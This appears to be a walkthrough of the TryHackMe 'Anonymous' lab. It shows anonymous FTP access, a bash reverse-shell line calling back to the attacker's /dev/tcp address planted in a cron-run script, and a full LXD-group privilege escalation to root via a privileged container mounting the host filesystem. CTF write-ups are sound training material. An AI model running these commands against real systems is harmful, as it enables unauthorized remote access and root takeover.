Anonymous THM
IP
10.10.133.171Nmap inital scan
sudo nmap -sV -sC -A -oA nmap_inital 10.10.133.171
Nmap full scan
always a good idea to run a full scan after our initial scan
sudo nmap -p- -oA nmap_full 10.10.133.171Nothing interesting
Ports open
21:FTP
We can tell from our Nmap scan that anonymous login is enabled
22:SSH
139:SMB
445:SMB
FTP
let's use anonymous to login into the FTP server.
ftp anonymous@10.10.133.171Looking through ftp we find a directory called scripts, and within scripts we can see.
Let's download the files
get clean.sh
get removed_files.log
get to_do.txtviewing the to_do.txt we see.
couldn't agree more
When we look at clean.sh.
Interesting, wonder if this script is part of a cron job. If we look through removed_files.log.
we can see clean.sh has been ran several times, let's check out the time of the creation of the log
we can see the log file is being updated every minute, most likely a cron job running the clean.sh script. Let's see if we can replace the clean.sh with a bash reverse shell.
reverse shell
bash -i >& /dev/tcp/10.14.45.1/9001 0>&1we can add this one-liner to the end of the clean.sh script
Let's start a Netcat listener
nc -lvnp 9001Now let's put this on the FTP server
ftp anonymous@10.10.133.171
cd scripts
put clean.sh
Now we can wait for the scripts to execute and we should get a shell on the system.
Privilege escalation via namelessonone
Let's stabilize our shell
python3 -c "import pty;pty.spawn('/bin/bash')"in our new shell let's check our id and groups we are part off
we can see we are part of the adm group meaning, adm members usually have permission to read log files located inside /var/log we should first look there
didn't find anything interesting
Let's see if we can find any suid files
find / -type f -perm -04000 -ls 2>/dev/nullNothing interesting
Lets check the kernel version and see if there if it is vulnerable
cat /proc/versionnothing to interesting
if we look back into what groups we are part of we can notice we are part of the lxd group
we can refer to the following article https://steflan-security.com/linux-privilege-escalation-exploiting-the-lxc-lxd-groups/
But essentially, LXD relates to the Linux Container Deamon service. As we are part of the group we can use the service and we can abuse it. First, we need a few things
we need to clone the following repo onto our local machine
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sudo ./build-alpinefrom here we should have the following files
What did we do?
well any easy way we could go about this is to build an Alpine image (a lightweight Linux distribution) then once we transfer the compressed file over to our target system, we can start the container using the
security.privileged=trueflag, forcing the container to interact as root with the host file system
Now we need to transfer the compressed file to the target machine
lets start a python3 server
python3 -m http.server 8080from our target machine we can use wget to download the file
wget http://10.14.45.1:8080/alpine-v3.13-x86_64-20210218_0139.tar.gzNext on our target machine we need to import the image using the lxc command line tool, its important to do it within our home directory
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimageBefore we actually use the image it should be initialized and its storage pool should be configured, just pick default for all options
lxd initnow the image can then be run using the security.privileged flag set to true, which will grant the current user root access to the container
lxc init myimage mycontainer -c security.privileged=true
Now we need to mount the root folder of the container, under /mnt/root
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Now we can start the container and use the "exec" lxc command to execute a /bin/sh shell
lxc start mycontainer
lxc exec mycontainer /bin/sh
we are now root!
Last updated